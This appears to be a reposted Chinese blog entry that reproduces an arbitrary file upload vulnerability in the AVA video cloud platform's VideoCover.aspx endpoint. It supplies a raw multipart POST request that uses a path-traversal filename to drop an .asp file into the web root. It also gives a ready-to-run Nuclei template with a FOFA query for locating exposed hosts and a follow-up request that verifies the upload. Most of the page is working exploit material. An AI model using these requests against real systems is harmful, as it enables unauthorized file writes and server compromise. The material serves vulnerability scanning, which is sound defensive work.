「漏洞复现」奥威亚视屏云平台VideoCover任意文件上传

admin

103521
文章

87
评论

2023年12月17日00:56:23评论43 views字数 2192阅读7分18秒阅读模式

漏洞概述

「漏洞复现」奥威亚视屏云平台VideoCover任意文件上传

漏洞复现

「漏洞复现」奥威亚视屏云平台VideoCover任意文件上传

POST /Tools/Video/VideoCover.aspx HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 1015 7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/107.0.0.0 Safari 537.36Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avifimage/webp,image/apng,*/*;q=0.8,application/signed-exchangev=b3;q=0.9Connection: closePragma: no-cacheCache-Control: no-cacheUpgrade-Insectre-Requests: 1Accept-Language: zh-CN,zh;g=0.9Content-Length: 263Content-Type: multipart/form-data; boundary=68c4ca658cd4332dc386f53710e63a10

--68c4ca658cd4332dc386f53710e63a10Content-Disposition: form-data; name="file"; filename="/../../../AVA.ResourcesPlatform.WebUI/test1.asp"Content-Type: image/jpeg

123--68c4ca658cd4332dc386f53710e63a10--

「漏洞复现」奥威亚视屏云平台VideoCover任意文件上传

NUCLEI POC

「漏洞复现」奥威亚视屏云平台VideoCover任意文件上传

id: aoweiya-VideoCover-upload

info:  name: 奥威亚视屏云平台VideoCover任意文件上传  author: rain  severity: high  metadata:    fofa-query: body="/CSS/NewtonTheme/assets/app.css"

http:  - raw:      - |        POST /Tools/Video/VideoCover.aspx HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 1015 7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/107.0.0.0 Safari 537.36        Accept-Encoding: gzip, deflate        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avifimage/webp,image/apng,*/*;q=0.8,application/signed-exchangev=b3;q=0.9        Connection: close        Pragma: no-cache        Cache-Control: no-cache        Upgrade-Insectre-Requests: 1        Accept-Language: zh-CN,zh;g=0.9        Content-Length: 263        Content-Type: multipart/form-data; boundary=68c4ca658cd4332dc386f53710e63a10

        --68c4ca658cd4332dc386f53710e63a10        Content-Disposition: form-data; name="file"; filename="/../../../AVA.ResourcesPlatform.WebUI/test.asp"        Content-Type: image/jpeg

        123        --68c4ca658cd4332dc386f53710e63a10--      - |        GET /test.asp HTTP/1.1        Host: {{Hostname}}        Pragma: no-cache        Upgrade-Insectre-Requests: 1        Connection: close        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avifimage/webp,image/apng,*/*;q=0.8,application/signed-exchangev=b3;q=0.9        Accept-Encoding: gzip, deflate        Cache-Control: no-cache        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36        Accept-Language: zh-CN,zh;g=0.9

    matchers:      - type: dsl        dsl:          - status_code_2==200 && contains_all(body_2,"123")

原文始发于微信公众号（知黑守白）：「漏洞复现」奥威亚视屏云平台VideoCover任意文件上传

左青龙
微信扫一扫

右白虎
微信扫一扫

「漏洞复现」奥威亚视屏云平台VideoCover任意文件上传

【漏洞预警】Next.js < 14.1.1 Server Actions SSRF漏洞

CVE-2024-29269 RCE漏洞（附EXP）

CVE-2024-21006 Oracle WebLogic Server RCE POC

【漏洞预警】OpenMetadata SPEL注入漏洞 (CVE-2024-28847)

叮～你有新的速递！CNVD-2024-02175 RCE漏洞（附EXP）

漏洞复现 | 图书馆集群管理系统interlib updOpuserPw SQL注入漏洞【附poc】

【高危漏洞】锐捷统一上网行为管理与审计系统存在命令执行漏洞

CVE-2024-32399｜RaidenMAILD Mail Server路径遍历漏洞（POC）

CVE-2024-34351｜Next.js框架存在SSRF漏洞

CVE-2024-21793｜F5 BIG-IP Next Central Manager存在多个安全漏洞（POC）

发表评论

在线咨询

微信